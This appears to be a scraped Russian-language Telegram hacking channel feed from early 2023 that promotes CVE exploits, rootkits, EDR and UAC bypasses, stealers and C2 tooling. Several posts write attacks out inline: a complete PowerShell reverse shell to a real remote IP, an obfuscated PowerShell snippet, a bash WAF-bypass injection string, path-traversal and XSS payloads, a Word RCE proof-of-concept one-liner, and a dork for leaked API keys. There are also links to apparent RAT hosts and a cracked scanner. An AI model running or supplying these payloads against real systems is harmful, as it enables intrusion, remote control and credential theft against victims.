CVE-2022-20421Bad Spin: Android Binder Privilege Escalation Exploitdownload#android |
|
2023-06-01 15:58:34 |
Какой боевойhXXp://34.101.154.50/ |
Images
|
2023-06-01 14:34:28 |
Rootkit INTRACTABLEGIRAFFEproof of concept*Из прикольного:Использует скрытую виртуальную файловую систему (VFS) для хранения файлов за пределами стандартной файловой системы Windows. При чем как энергозависимую, так и энергонезависимую скрытую VFS.Keylogger - для демонстрации*download#windows #rootkit |
Images
|
2023-06-01 13:09:08 |
CVE-2023-23638Apache-DubboPOC exploit#apache |
Images
Images
|
2023-06-01 12:11:42 |
придумайте слоган на фильма )) |
Images
|
2023-05-31 14:44:47 |
так и живем, на xss запрещают, на экспосе разрешают.Пронаблюдаем ! |
Images
|
2023-05-31 06:31:25 |
просто прекрасно |
Images
|
2023-05-31 06:26:05 |
Data Structures & Algorithms Essentials using C++ (2022)7.3 GBLink |
|
2023-05-30 16:02:09 |
raid forum это конечно хорошоа вот настоящий слив !есть ли тут связь ?)😝 |
Images
|
2023-05-30 14:31:41 |
show time ))) |
|
2023-05-30 07:45:24 |
Министерство обороны США рекомендует:DevSecOps Fundamentals Guidebook |
Images
|
2023-05-30 07:31:01 |
CVE-2023-33246*Apache RocketMQ*readPOC |
|
2023-05-29 20:30:00 |
Emoji Shellcoding 😋Улыбаемся и бэкдоримRISC-V#shellcodes #smile |
Images
|
2023-05-29 12:35:50 |
RansomchatsСборка чатов\переговоров с рансомварщиками )#ransom |
Images
|
2023-05-29 06:48:14 |
kill anti-malware protected processes (BYOVD) |
Images
|
2023-05-29 06:23:51 |
CVE-2023-32315openfire xmppserver Administration Console authentication bypasspath traversal - только в UTF-16 http://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jspА кто вообще в здравом уме, после инсталла держит папку setup на сервере ? read#jabber |
|
2023-05-28 16:22:36 |
car hacking courselink |
Images
|
2023-05-28 06:43:17 |
CVE-2023-2825GitLab - Community Edition\Enterprise EditionУязвимость позволяет неавторизованным пользователям читать произвольные файлы через ошибку обхода пути.POC Exploit#gitlab |
Images
|
2023-05-21 19:35:47 |
Слив темы инжектов, chromium расширение для работы с ботамиФункционал: Инжект скриптов в веб-страницы Сбор cookies в формате .json Отправление PUSH уведомлений Создание скрытого скриншота текущего экрана браузера Просмотр всех установленных расширений и их включение/выключение Получение актуального URL на котором находится бот Выгрузка истории браузера в формате .json Использование IP бота и его куки (reverse proxy)ссылка https://xss.is/threads/80558/Стоимость продукта на форуме : 5.000$ |
|
2023-05-21 06:43:17 |
SSH-HarvesterПолучаем пароли ssh пользователей в открытом виде.Ну да ну да, еще пару лет назад была статья, что ssh сервер при авторизации порождает 2 процесса, на одном из которых пасс катится в открытом виде, собственно на этом моменте его и вытягивают.В общем поставили скрипт, рыбалка идет сама собойDownload |
Images
|
2023-05-20 19:04:51 |
Еще раз о linux persistenceНичего нового, но красиво и уже готовые скриптыread#linux #backdoors #oldbutnotuseless |
Images
|
2023-05-20 12:05:29 |
Тут LockBit (ransomware запрещено на территории квартиры) взяли, да и перевели "Руководство пользователя по Cobalt Strike'у 4.7" на русский язык.К чему это все, думайте сами)))) |
|
2023-05-19 17:27:49 |
Пятничное |
Images
|
2023-05-19 14:44:48 |
DevSecOps guidesПочитать |
|
2023-05-19 11:09:42 |
CVE-2023-21554win message подъехалиPOC#win #poc |
|
2023-05-19 07:29:51 |
ChatGPT как C&C, Хех)#GPT #C2 |
Images
|
2023-05-18 10:34:14 |
UAC_Bypass2.c#bypass |
|
2023-05-17 21:19:22 |
AntiRansomware Linux Kernel Module Это успех, то есть, для защиты от рансома, был написан фактически rootkit с перехватом sys_renameА вот затея с суффиксами плохая, всегда можно генерить на основе железа и например хоть аптайма уникальный суффиксlink |
Images
|
2023-05-17 16:04:40 |
Занятный PowerShell обфускатор${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;};${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;};${"}="["+"$(@{})"[${)}]+"$(@{})"["${+}${|}"]+"$(@{})"["${@}${=}"]+"$?"[${+}]+"]";${;}="".("$(@{})"["${+}${[}"]+"$(@{})"["${+}${(}"]+"$(@{})"[${=}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]);${;}="$(@{})"["${+}${[}"]+"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${[}+${"}${)}${@}+${"}${+}${=}${+}+${"}${+}${=}${&}+${"}${+}${=}${&}+${"}${+}${+}${+}+${"}${[}${[}+${"}${.}${@}+${"}${+}${+}${|}+${"}${+}${+}${+}+${"}${+}${+}${[}+${"}${+}${=}${&}+${"}${+}${=}${=}+${"}${.}${.}+${"}${.}${[}|${;}"|&${;}; есть триалка#poweshell |
Images
|
2023-05-17 15:37:00 |
CVE-2023-32243wordpressEssential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalationexploit#wordpress #plugin |
|
2023-05-17 15:30:49 |
SCCM/MECMЕще один способActive Directory Spotlight: Attacking Microsoft's Configuration Manager#sccm #ad |
Images
|
2023-05-17 11:58:44 |
Exploit NotesВ целом ничего нового, но компиляция красиваяread#pentest |
|
2023-05-16 20:33:46 |
CVE-2023-32233exploit#Linux #LPE |
|
2023-05-16 19:24:27 |
From DA to EA with ESC5или уязвимый контроль доступа к объектам PKIread and run #AD #PKI |
Images
|
2023-05-13 18:44:08 |
Прикольно |
|
2023-05-12 20:56:55 |
Тушу |
|
2023-05-12 20:26:06 |
Завтра |
|
2023-05-12 17:56:00 |
None |
Images
|
2023-05-12 17:54:58 |
Ххм |
|
2023-05-12 17:54:50 |
None |
Images
|
2023-05-12 17:35:35 |
Боже |
|
2023-05-10 21:10:56 |
Этож знал.НиктоПростиПрости всех |
|
2023-05-10 20:14:04 |
Курить хочу |
|
2023-05-10 20:13:48 |
Спасибо |
|
2023-05-10 20:13:43 |
Нет ненадо |
|
2023-05-10 20:13:21 |
Но |
|
2023-05-10 20:13:08 |
Как больно |
|
2023-05-10 20:12:42 |
Бляя |
|
2023-05-10 20:12:36 |
Цените что есть |
|
2023-05-10 20:12:07 |
Рнбятт |
|
2023-05-10 20:11:56 |
Блятььььь |
|
2023-05-10 20:08:50 |
Блять |
|
2023-05-10 20:08:38 |
Сукп |
|
2023-05-10 20:08:34 |
Аааааа́сссссссссааааааа́сс |
|
2023-05-10 20:08:22 |
Мать твою |
|
2023-05-10 19:10:08 |
Ладно гуляем |
|
2023-05-10 19:09:49 |
None |
Images
|
2023-05-10 18:25:25 |
Это круто |
|
2023-05-10 18:25:15 |
Уж извините |
|
2023-05-10 18:24:59 |
None |
Images
|
2023-05-10 18:24:49 |
Ребят Это красво |
|
2023-05-10 18:06:28 |
Молодецы |
|
2023-05-10 18:06:13 |
Мужики дело делают |
|
2023-05-10 18:05:53 |
Отлично |
|
2023-05-10 18:05:44 |
Вот это бои |
|
2023-05-10 16:46:22 |
Гоу |
|
2023-05-10 16:46:17 |
None |
Images
|
2023-05-07 18:31:32 |
ты не маленький винтик в системеты важная часть механизмапросто помни об этом ))) |
Images
|
2023-05-06 04:37:08 |
Positive hack days 12Не забываем, что совсем скоро мероприятиегде: Москвакогда: 19-20 маялокация: парк Горькогоphdays12*Приходите, будет весело) |
Images
|
2023-05-05 20:31:52 |
CVE-2023-28231DHCP Server Remote Code Executionimpact: 2008 R2 SP1 до Server 2019#windows #dhcp #exploit |
|
2023-05-05 12:01:14 |
CVE-2023-0386Linux Kernel Privilege Escalation*readME*exploit#linux #exploit |
Images
|
2023-05-05 06:30:45 |
SCCMHunterНайти и подломить sccm это всегда праздник, фиеста и платиново-бриллиантовые ключи от города домена. Веселее только с ansible.Ну так вот, 11 часов назад, выкатили post-ex tool, которая способствует !Link#windows #sccm |
Images
|
2023-05-04 19:48:52 |
По поводу слива АЛЬФА БАНКАНу да, паспорта слили |
Images
|
2023-05-04 16:11:14 |
Happy World Password Day! |
Images
|
2023-05-04 09:15:32 |
Apache Solr 8.3.1admin panel RCE (Windows)readmeexploit#apache #exploit |
|
2023-05-04 05:59:52 |
Извлекаем хэши NetNTLMv2 входящих аутентификаций через SMBPOC*Usage:C:\Temp\>EtwHash.exe 60 |
|
2023-05-04 05:41:17 |
HoneybitsХанипот с дополнительными хлебными крошками.Из интересного:Fake PCAP / network traffic containing credentials and etc.Fake ARP Table entries.То есть, в целом, это можно использовать и НЕ для защиты, мусорный трафик бывает полезен.Link#security |
Images
|
2023-05-03 15:34:07 |
signal-zeroday-exploitusage:python poc.py -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE] |
|
2023-05-03 14:49:32 |
К праздникам скидки )))) |
Images
|
2023-05-02 09:20:46 |
CVE-2023-21554Нужно только пакетик отправить на MSMQ-сервер (да, он должен быть включен) и можно выполнять remote commandPOC Пакетик#windows |
Images
|
2023-05-02 06:30:17 |
Заходите#Osint_eventНас звали, и мы пришли Osint Workshop Ⅳ (Moscow edition) ! В этот раз наша команда посетит столицу и расскажет о новых методиках, интересных кейсах и погрузит вас в атмосферу наших профессиональных будней. Ждем вас 😉Планируемые доклады: "Osint и S.E. в Нетворкинге, Поиск влиятельных друзей в цифровом океане"● Автор: «Обмани Меня»"Osint в адвокатской деятельности"● Автор: [REDACTED]"Дом выигрывает всегда? В поисках владельцев одного казино"● Автор: «Исследуя конкурентов» При участии: Moon, Dana Scully(возможно, к нам присоединятся наши коллеги из Москвы)Мероприятие пройдет 13 мая, в 18:00 по адресу: Green Vault, лаундж-бар, Верхняя Радищевская улица, 13-15, МоскваВход без паспорта, бесплатно. |
Images
|
2023-05-02 06:28:25 |
Ну а что, все законно ))) |
Images
|
2023-05-01 14:28:09 |
curl https://sudo.ws/ftp/etc/groupхмммм |
Images
|
2023-04-29 06:20:49 |
И еще раз о CVE-2023-29489 cPanel и XSSFinding XSS in a million websites#cPanel #xss |
Images
|
2023-04-28 11:51:37 |
CVE-2023-29489cPanel#cPanel #xss |
Images
Images
|
2023-04-28 09:15:33 |
Шо, Опять babuk, conti и все все все ?Пятница серьезно вступила в свои праваМеня шантажируют, я не знаю что делать |
|
2023-04-28 07:56:56 |
Public malware techniques used in the wildVirtual MachineEmulationDebuggersSandbox detection*RUN #malware |
Images
|
2023-04-27 04:56:49 |
CVE-2023-29007Git Arbitrary Configuration Injection*readme*POC exploit#git #exploit |
Images
|
2023-04-27 04:09:31 |
CVE-2023-1585 and CVE-2023-1587Смешное)))Avast Anti-Virus privileged arbitrary file create on virus quarantinereadme*POC exploit#avast #LPE |
Images
|
2023-04-25 15:42:14 |
Не статья, а книга целаяransomware diaries volume 2 A Ransomware Hacker Origin StoryUPD: а теперь они в твитере сруться )))#ransome |
Images
|
2023-04-25 13:37:02 |
Очень хорошо*An Introduction into Sleep ObfuscationreadFull Ekko code#Obfuscation |
Images
|
2023-04-25 13:06:31 |
CVE-2023-27524Apache Superset Auth BypassPOC exploitдень бога я смотрю#apache #poc |
|
2023-04-25 13:03:16 |
CVE-2023-1671Pre-Auth RCE in Sophos Web ApplianceCVSS score of 9.8POC#poc #sophos |
|
2023-04-25 07:50:24 |
httpXXX://147.182.180.78:8081/CraxsRat-Linuxndroid/#CraxsRAT #CypherRAT |
Images
|
2023-04-18 16:18:06 |
Sandbox EscapePOCДырка в преобразователе исходного кода (логика очистки исключений) vm2 для версий до 3.9.15, позволяющая злоумышленникам обходить handleException() и передавать непроверенные исключения хоста, которые можно использовать для выхода из песочницы и запуска произвольного кода в контексте хоста. |
Images
|
2023-04-16 15:41:25 |
CVE-2021-35250да, 21 год, да если хорошие люди просят мы публикуемпатч ? пачт ?!!SolarWinds-CVE-2021-35250 POC exploit*Немедленно вспоминается атака на цепочки поставок#solar |
Images
|
2023-04-16 03:18:08 |
829 гигов мусора |
Images
|
2023-04-13 16:46:44 |
И чо |
|
2023-04-13 16:24:08 |
Ээ́асеисещэ |
|
2023-04-13 16:23:41 |
Спасиро7это типа.срсаЛадно |
|
2023-04-13 04:06:36 |
Приветдруг, канал закрытПОЧЕМУ ????ложусь в больниуцупросить , нет, не буду, сама сдохну.....канал...... если успею... передамвсе спасибо, вы лучшиеBTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82но вы понимаете, не обязательноЗЫесли вырнусь, верусь, добра мап |
|
2023-04-13 00:54:23 |
ох))))) тут нужно целый сесёрч писать, но пошел он нахуй, лучше выпью и вот я уже на ГИТе внутренней сетки, не возможно ?да , еще как можно ))))))))))))))))))))) |
|
2023-04-13 00:51:50 |
щас я вам аккаунты то приподниму ______))))) |
|
2023-04-13 00:51:22 |
это просито пиздец)))))))))))))))))))))))))))))))) |
|
2023-04-13 00:51:10 |
блять )))))) |
|
2023-04-13 00:50:55 |
None |
Images
|
2023-04-01 20:33:53 |
В рамках науч-ИТ-юмор-драмы A list of my 10 UNIX command line mistakes#1april |
Images
|
2023-03-31 20:27:42 |
Linux kernel CVEsALL CVE - на сейчас 2359 CVEЭто не сплоиты или POC, такие кумулятивы бывают крайне полезны, а тут по папкам\по кернелу\с описанием\где пофиксили*linux_kernel_cves#linux #kernel #vulns |
Images
|
2023-03-30 13:11:34 |
Нет, мистер из FBI, вы нас больше не обманите.С восстановлением рангов с raidforum конечно максимально круто ! Нужно думать кого то неДоПоймали, а значит нужно взять знакомую веб морду, дропнуть БД и задеплоить ханипот, а дальше американский майор разберется по какой статье\из какой страны тебя экстрадировать#FBI |
Images
|
2023-03-30 07:40:21 |
В Питере пройдет Osint туса*А мы продолжаем! Osint Workshop ⅠⅠ Программа мероприятия подойдет как профессионалам, которые хотели бы освежить основы дисциплин, так и для полных новичков. Будет интересно обещаю ;) Ожидаемые доклады:"История возникновения OSINT" Автор: Вильям Арчибальд "Social Еngineering & OSINT: методология, инструменты, актуальные сферы применения"● Автор: @socialqueen"OSINT в корпоративной безопасности" ● Автор: @OsintOpsChannelАктуальная информация и стрим мероприятия на канале: Schwarz_OsintВоркшоп будет проходить 8 апреля в 18:00. Место проведения: Артмуза (13-я лин. В.О, 70, Санкт-Петербург). |
Images
|
2023-03-29 19:16:30 |
хм 🧐https://exploit.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexploit.in%2F2005%2F193%2F&format=xml |
|
2023-03-29 10:31:05 |
None |
Images
|
2023-03-28 16:40:06 |
Рубрика: Нам пишутCaveCarverPE backdooring tool which utilizes and automates code cave technique #backdoor #PE |
Images
|
2023-03-28 16:30:55 |
github dork to find openai api key/"sk-[a-zA-Z0-9]{20,50}"/ |
Images
|
2023-03-28 04:53:30 |
Вдруг вам нужно403-bypass.pybypass-403.sh B1pass3r#403 |
|
2023-03-26 10:21:16 |
ChatGPT for CyberSecurityPDF |
Images
|
2023-03-26 06:45:24 |
Chaos-Rootkitx64 ring0 windows rootkitdownload#rootkit #windows #ring0 |
Images
|
2023-03-25 07:44:47 |
None |
|
2023-03-25 07:44:46 |
None |
Images
|
2023-03-25 07:44:45 |
Бывает полезно скрыть ip через hex/decimal преобразованиеwindows\linux\browser - работает везде*вот вам 2 варианта, и bash и powershell |
|
2023-03-24 17:45:34 |
Время добрых дел.Многие знают, есть такой клёвый юзер xss.is yashechkaОн генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут". Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:S.M.E. - Прошу руку помощи у форумчанТам Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.*Наш канал не пройдет мимо и тоже окажет помощь. |
Images
|
2023-03-24 05:49:59 |
CVE-2023-27532Да, опять Veeam Backup & Replication Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.*Аналитика*POC exploit*usage:VeeamHax.exe --target 192.168.0.100 илиVeeamHax.exe --target 192.168.0.100 --cmd calc.exe#veeam #rce #leakPass |
Images
Images
|
2023-03-23 05:28:39 |
kernel-linux-factory*Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root*в составе exploits для:CVE-2016-97934-20-BPF-integerCVE-2017-5123CVE-2017-6074CVE-2017-7308CVE-2017-8890CVE-2017-11176CVE-2017-16995CVE-2017-1000112CVE-2018-5333CVE-2019-9213 & CVE-2019-8956CVE-2019-15666CVE-2020-8835CVE-2020-27194CVE-2021-3156CVE-2021-31440CVE-2021-3490CVE-2021-22555CVE-2021-41073CVE-2021-4154CVE-2021-42008CVE-2021-43267CVE-2022-0185CVE-2022-0847CVE-2022-0995CVE-2022-1015CVE-2022-2588CVE-2022-2639CVE-2022-25636CVE-2022-27666CVE-2022-32250CVE-2022-34918download#linux #exploits #kernel |
|
2023-03-22 20:33:43 |
pic of day |
Images
|
2023-03-20 19:19:16 |
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//14.rs>то есть вместо стандартной полезной нагрузки XSS для выполнения js |
Images
|
2023-03-20 18:47:47 |
Рубрика нам пишутBlack Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality. link |
Images
|
2023-03-19 18:29:46 |
UAC bypass for x64 Windows 7 - 11Понятно iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64. |
Images
|
2023-03-19 18:19:16 |
Laravel FrameworkPayload: //////////////////../../../../../../../../etc/passwd |
Images
|
2023-03-18 22:09:59 |
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно. Тупо бэкдор!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
|
2023-03-10 18:48:36 |
полезные нагрузки подъехалиpayloads |
Images
|
2023-03-10 18:29:50 |
Круто !!! old school sniffing RJ45берем крокодильчикицепляем на витухупогналиVideo |
Images
|
2023-03-09 14:54:58 |
🧐 |
Images
|
2023-03-09 11:56:52 |
Offline создание администратора Windows 10? 😈ОгаВсё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.OfflineAddAdmin2 (это новая версия)Видео туториал |
Images
|
2023-03-09 04:54:56 |
CVE-2023-21768 Local Privilege EscalationWindows 11 22H2POC exploit *usage:Windows_AFD_LPE_CVE-2023-21768.exe <pid>где <pid> это id процесса который нужно повысить до system#windows #lpe |
|
2023-03-08 05:51:12 |
0-CLICK Microsoft Word RCE exploitCVE-2023-21716 PythonPoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) |
|
2023-03-07 20:41:48 |
8 марта вот вот настанет ! 😊Поддержим проект ?)BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#праздник |
|
2023-03-07 19:14:12 |
pic of day |
Images
|
2023-03-07 11:58:34 |
BurpSuite* man\tutorВдруг вы забыли |
Images
|
2023-03-05 20:50:14 |
Внимание !через 10 минут опять понедельник.Вот вам rootkit dog😎 |
|
2023-03-05 08:02:55 |
использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root. |
Images
|
2023-03-04 05:12:06 |
RemoteShellcodeExecВыполнение шелл-кода из удаленного bin-файла с помощью Winhttp.Shellcodes are dead, long live fileless shellcodes.*Пока что 0/26 detectionsdownload |
Images
|
2023-03-03 04:49:59 |
Нужно больше жира))))) Analyzing a Python Malware Part 2 |
Images
|
2023-03-02 16:03:45 |
None |
|
2023-03-02 05:02:56 |
Titan stealer и его панель (C2Panel) жирно палитсяThreatFox Database |
Images
Images
|
2023-03-01 18:56:12 |
bash injection bypass waf $0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\' |
Images
|
2023-02-27 18:32:12 |
Lazarus-Tactic (APT38)*Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).В общем такой 0day-stealer**После запуска программа заразит все ваши проекты Visual Studio** |
|
2023-02-26 14:03:52 |
TCP Data Transfer Tool Прикольно конечно в кернелМемори писать гадости\радости всякие.В общем получается почти !!! fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его. |
|
2023-02-26 07:11:56 |
bootlickerУстаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.*vmvware-bootkit основан на устаревших руткитах CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*Download bootlicker#rootkit #bootkit |
|
2023-02-24 12:07:37 |
OpenSSH 9.1 exploit and mass scan*Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.download exploit and mass scan#ssh #exploit #scanner |
|
2023-02-23 11:33:48 |
Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !Тем временем:#СкребемПоКиберСусекам |
|
2023-02-22 16:11:10 |
Ударим ГовноПарсером lsass по приближающимся выходным !download this shit (вас блин предупреждали) |
|
2023-02-22 07:07:06 |
Weblogic-CVE-2023-21839*Affected version12.2.1.3.012.2.1.4.014.1.1.0.0POCUsage POC:java -jar target ip: адрес порта ldap |
|
2023-02-22 06:59:38 |
Давайте создадим расширение для Chrome, которое крадет ВСЁ*Ключевые правила:1.Пользователь не должен знать, что за кулисами что-то происходит.2.Не должно быть никаких визуальных признаков того, что что-то не так.3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.4. Нет дополнительных предупреждений браузера или диалогов разрешений.5.Нет дополнительного сетевого трафика на уровне страниц.*В итоге мы воруем: - Cookies - History - Screenshots - User Navigation - Page Traffic - Keylogger - Input Capturing - Clipboard Capturing - Capturing Geolocation - Stealth Tab *Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )spy-chrome-extension#chrome #extension |
|
2023-02-21 14:43:33 |
CVE-2022-39952 Fortinet FortiNAC CVSS score of 9.8Продукты, затронутые уязвимостью: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 FortiNAC version 9.1.0 through 9.1.7 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions, and FortiNAC 8.3 all versionsPOC exploit#forti #poc |
|
2023-02-20 07:09:19 |
HIVEМы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.В личной переписке он сознался что - смотреть скриншотVLAN L2 Pivoting Instrument#network #hacking |
|
2023-02-18 11:00:31 |
Привет) |
|
2023-02-17 04:51:18 |
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true' |
|
2023-02-16 18:29:01 |
CVE-2022-44666WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.POC в наличииGo#win #poc #vuln |
|
2023-02-16 18:20:57 |
Ну VirusTotal как C2 уже былGithub as C2 почему бы и нет )Get#C2 |
|
2023-02-16 13:45:33 |
SSH-Remote-Code-Executionхммммм 🤨 |
|
2023-02-16 04:48:32 |
Вдруг вам нужноBurp Suite Certified Practitioner Exam Study |
|
2023-02-15 10:10:44 |
Рекомендовано всем к прочтениюлинк xss.is |
|
2023-02-13 18:51:19 |
RCE in Western Digital PR4100 NASspeech_exploit_patch |
|
2023-02-13 18:28:38 |
Windows LPE via StorSvcdownload |
|
2023-02-13 18:26:25 |
Драсти |
|
2023-02-11 12:18:21 |
BokuLoaderРасширяем возможности уклоненийBokuLoader - Cobalt Strike Reflective Loader |
|
2023-02-10 11:39:00 |
Извините, но пятничное ) |
|
2023-02-10 04:34:18 |
DEUS X64 |
|
2023-02-09 04:52:45 |
CVE-2023-25136 - OpenSSH - Pre-Auth Double FreeWriteupPoC - вызывает DOS серванта |
|
2023-02-08 18:29:35 |
backdoor и shellCode билдер под разные архитектуры (0x001)hackebds#shellcode #backdoor #arch |
|
2023-02-08 18:19:07 |
UnhookingPatchОпять byPass опять EDRПюрешка с котлеткой#win #edr |
|
2023-02-08 10:05:02 |
NetworkNightmareВеликолепный Магама AKA @c4s73r в рамках сетевого беспредела опубликовал свои труды на благословенной гитхабе.С чем поздравляем и поддерживаем ! 😜NetworkNightmare#подрывУстоев #network |
|
2023-02-08 04:43:03 |
LFI |
|
2023-02-07 05:17:33 |
exploit для активно эксплуатируемой уязвимости нулевого дня, затрагивающий консоли администрирования GoAnywhere MFT.readshodan - total 1000exploit |
|
2023-02-06 16:20:44 |
Лол))))) SSRF |
|
2023-02-06 15:45:05 |
Nidhogg rootkitВиндовый rootkit написанный на C++, по заявлению авторов сильно дружит с любыми версиями win 10 и win 11. Так же руткит можно примотать синей изолентой к своему C&C и долго медитировать на бегущий трафик.Скачать тут#rootkit #windows #redteam |
|
2023-02-06 15:24:21 |
Картоха ! from Service to SYSTEMRasmanPotatodownload#windows #priv |
|
2023-02-06 13:11:51 |
CVE-2022-44268Arbitrary File Read PoC - PNG generatorPoC |
|
2023-02-06 09:48:19 |
BypassAVкарта с основными методами обхода антивируса и EDR.MAP |
|
2023-02-05 07:00:54 |
DevOps игры (в рамках эксперимента воскресенья)*devops.gamesdevopspartygamesoverthewire (linux war games)ohmyGITcodingame |
|
2023-02-05 06:06:59 |
SCRIPT HTTP-SQL-INJECTION (NMAP)download |
|
2023-02-04 16:36:09 |
BurpSuiteSharpenerdownload |
|
2023-02-04 10:21:12 |
CVE-2023-25135vBulletin - RCE + exploitman+exploit#exploit #vBulletin |
|
2023-02-04 08:55:30 |
RATникиВчера мы говорили про мартицы C&C серверов\фреймворковА сегодня про матрицу RATТут хватит всем #rat |
|
2023-02-04 08:47:58 |
CVE-2023-0045Bypassing Spectre-BTI User Space Mitigations on Linux |
|
2023-02-04 07:21:24 |
Acunetix Premium v15.3.230123162_Win x64+crack |
|
2023-02-03 21:27:46 |
NTDLLReflectionОбход перехватчиков EDR Userland путем загрузки Reflective Ntdll в память с удаленного сервера на основе Windows ReleaseID, чтобы избежать открытия дескриптора для ntdll и активировать экспортированные API-интерфейсы из таблицы экспорта.*В общем очередной (свежий) ByPassdownload#windows #bypass |
|
2023-02-03 16:34:34 |
CobaltStrike ? НЕТ !Тут хватит всемВпрочем об альтернативах мы уже писали несколько раз#C2 #c&c |
|
2023-02-03 03:42:01 |
IBM Aspera Faspex - Pre-Auth RCE+ exploit coderead and run |
|
2023-02-02 20:04:27 |
Я просто оставлю это здесь - ЫТЬ CVE-2022-44268 POC |
|
2023-02-02 16:31:02 |
CVE-2023-21608 - RCE - Adobe Acrobat ReaderVideo proofpass: proxy_bar#exploit #rce #acrobat |
|
2023-02-02 09:37:51 |
Художественный фильм "спиз.." "golden certificates"*certsync - это новая техника для удаленного дампа NTDS, но на этот раз без DRUAPI: он использует золотой сертификат и UnPAC хеш. * domain admin - не нужен, хватит и CA admindownload#windows #cert |
|
2023-02-02 05:27:00 |
RedTeam-ToolsИнструменты и техники для Red TeamИмеровover 100 toolsdownload#red #pentest #tools #man |
|
2023-02-01 04:52:25 |
PassTheCertаутентификация на сервере LDAP/S с сертификатом через SchannelПока в виде концепта, но уже интересно |
|
2023-02-01 04:33:26 |
CVE-2023-23924 библиотека Dompdf - RCECVSS score: 10 !!!Конкретнее о дырке тут#php #vuln #poc |
|
2023-01-31 16:30:16 |
exploit for VMware vRealize Log InsightTechnical Deep Divedownload EXPLOIT#exploit #vmware |
|
2023-01-31 04:59:22 |
D1rkLrd - свежее1 - Shellcode Loader with Indirect Dynamic syscall Implementation2 - shellcode in MAC format3 - API resolving from PEB4 - Syscall calll and syscall instruction address resolving at run timedownload#windows #shellcode |
|
2023-01-31 04:47:53 |
CVE-2022-25765 - PDFkit-CMD-InjectionПодробности дырки тутexploit#exploit |
|
2023-01-31 04:36:55 |
УтрыDecompiler Explorer |
|
2023-01-30 15:12:16 |
Tangled WinExecКрайне интересно, загляните в папку ReflectiveDLLInjectionпосмотреть |
|
2023-01-30 13:34:05 |
BypassCredGuardОбход Credential Guard через исправление памяти Wdigestdownload#windows #bypass |
|
2023-01-29 19:59:11 |
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)exploit#myBB |
|
2023-01-29 17:37:26 |
